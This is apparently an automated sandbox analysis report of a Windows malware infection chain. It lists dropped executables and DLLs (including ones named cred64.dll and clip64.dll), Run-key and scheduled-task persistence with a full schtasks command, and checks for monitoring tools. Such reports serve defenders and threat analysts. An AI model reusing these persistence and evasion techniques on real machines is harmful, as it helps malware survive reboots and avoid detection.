Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\qPQ3lJ1fN9DRgfiXtyMpf1ll.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\11xbcpylNeYY4tZ39QN34xGC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\iFyHzFXRkeOppMlu3FtGrLYy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\QcyIEuk7gD7wTlhElB94jgu9.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\tAKreBGDuozTwXSZfhU7cFT3.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\3N5jWnvXHqfYUsxTijnW3Uc5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\i8dOWYOLtbNAxDJGOQ8Wt9el.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\v3efLAgS1BVue6uNuzFECLaH.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\xF7m0A44x6KodDxbhAtiDsub.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\X53t1QSznpDGsvX2qLbdQFD1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Osh3JGbyB69u4I6NltayynfD.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\install[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\swiiiii[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\MtYY7PxoMVCDp1NJbYQga2LV.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\jzMGE9Xb2Ny8jtCWlXWAk3ap.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\de4IGlGSbV9c3J4m0qZtBGm8.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\aYtr3HT3BUqjK6QB6WYpwCcm.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\zWIy5Pdf1kgq9YulaqIKrGGy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\JcuJCrKoIRAAJIb94uRnhVjr.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Z0V3bHdPFsglc9f9uLbxOZFN.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\leqbtljZtxj2WxVvdmpHiNsI.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\ppcQqLgPI8Dyy7YykX33fm5x.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\S41vy8IsPU7Iudry37c4uNtg.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000081001\install.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Temp\1000236001\4767d2e713f2021e8fe856e3ea638b58.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.2\AsIO.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.2\ATKEX.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jfesawdr[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\STUD4CnDuvZtXsKBuBkO31id.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\M4OBi0ywNcuUZRFLcfJ70nUH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\iO9tAKw78L31Wsbvnq5kt5m1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\f2NBhcBIObRGHagt6xPQoMa2.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\gjVUxsTFUgOAjApkeCU52nGD.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\1000021002\ac861238af.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\rVg8HtIzXa4xhJHL7Pn8A6d2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\v6zcDFD3cRDhmr34kNKDn8tX.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\Jr1vIs8XqAmt0RT7bHMte8ts.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\gKIISy7hixfPFGDeeM7cQzit.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\SjGlviky3CjPwV1vWXl2gdhJ.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\D7t23m0X26bEkZqkCQtNwK5Y.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\s8YO7ScTlLADC9Vt6wr10aY4.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\PHoZl3WswCZ1lCRWCJPBFZtN.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\pl49PSFkcWVTQqBe8TA2VhRW.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\alexxxxxxxx[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\7iI5SUAnqRGyB1YdSAO06W1v.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\file300un[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\gzxs1MlpU5tnMfkC7kzgvR1h.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ac861238af.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d361f35322.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Creates job files (autostart)
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Windows\Tasks\explorta.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d361f35322.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d361f35322.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ac861238af.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ac861238af.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000021002\ac861238af.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000021002\ac861238af.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000021002\ac861238af.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
